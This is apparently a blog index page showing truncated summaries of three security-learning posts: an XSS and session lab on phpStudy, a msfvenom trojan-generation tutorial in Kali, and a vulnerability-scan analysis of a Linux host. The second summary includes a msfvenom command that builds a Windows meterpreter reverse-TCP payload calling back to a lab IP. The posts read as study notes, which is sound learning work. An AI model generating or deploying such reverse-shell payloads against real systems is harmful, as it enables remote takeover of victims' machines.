摘要: XSS-会话管理1、点击phpStudy,开启Apache服务2、编写前端页面并访问 http://127.0.0.1/xsss/01/login.html 3、编写登录页面,包含session函数(检查用户名密码是否为admin),并登录检查 4、编写维持会话功能,访问 http://127.0. 阅读全文
posted @ 2024-05-29 10:31 T-yr学习胶囊 阅读(17) 评论(0) 推荐(0)
摘要: 1、在kali主机中,使用msfvenom生成木马命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.192 LPORT=4444-a x86 --platform windows -f exe -o /home/tyr/De 阅读全文
posted @ 2024-05-29 10:17 T-yr学习胶囊 阅读(63) 评论(0) 推荐(0)
摘要: (1)建立新的扫描任务扫描Linux目标主机 192.168.101.149使用默认的Host类型,添加主机中的SSH服务证书。单击SSH(2)漏洞结果分析在下图中可以看出,主机中包含有不同级别的漏洞信息。可以单击该主机地址查看所有的漏洞条目查看一条严重的漏洞信息,即插件名为CentOS 7 : k 阅读全文
posted @ 2024-05-29 10:14 T-yr学习胶囊 阅读(95) 评论(0) 推荐(0)